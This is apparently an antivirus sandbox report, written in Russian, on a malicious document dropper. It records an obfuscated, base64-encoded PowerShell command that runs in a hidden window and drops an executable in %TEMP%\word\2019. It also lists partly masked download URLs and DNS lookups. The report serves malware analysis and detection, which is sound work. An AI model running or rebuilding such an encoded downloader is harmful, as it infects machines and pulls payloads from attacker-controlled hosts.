Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRADkAYwB4AHIANQBiAD0AKAAnAEMAJwArACgAJwBoAHAAdABzACcAKwAnAG4AJwApACsAJwA1ACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAJwArACcAbQAnACkAIAAkAGUATgB2ADoAdABlAE0AUABcAFcAbwByAGQAXAAyADAAMQA5AF...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\word\2019\spfb0wz5.exe
Удаляет следующие файлы
- %TEMP%\word\2019\spfb0wz5.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://ri####nterprise.com/dist/go/0Ay/
- http://ri####nterprise.com/cgi-sys/suspendedpage.cgi
- http://pr#####ollection.com/vinix/3e/
- http://re###aster.com/antiguo/WA/
- http://www.re###aster.com/antiguo/WA/
- http://po####sgn.com.br/corpore/xl/
- http://re###flight.be/PEAR2_maybe_not_used/H9l5C9Q/
- http://pi###.unixstorm.org/cgi-bin/LVZW/
UDP
- DNS ASK ri####nterprise.com
- DNS ASK pr#####ollection.com
- DNS ASK re###aster.com
- DNS ASK po####sgn.com.br
- DNS ASK re###flight.be
- DNS ASK pi###.unixstorm.org
- DNS ASK pu##r.nl
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRADkAYwB4AHIANQBiAD0AKAAnAEMAJwArACgAJwBoAHAAdABzACcAKwAnAG4AJwApACsAJwA1ACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAJwArACcAbQAnACkAIAAkAGUATgB2ADoAdABlAE0AUABcAFcAbwByAGQAXAAyADAAMQA5AF...' (со скрытым окном)
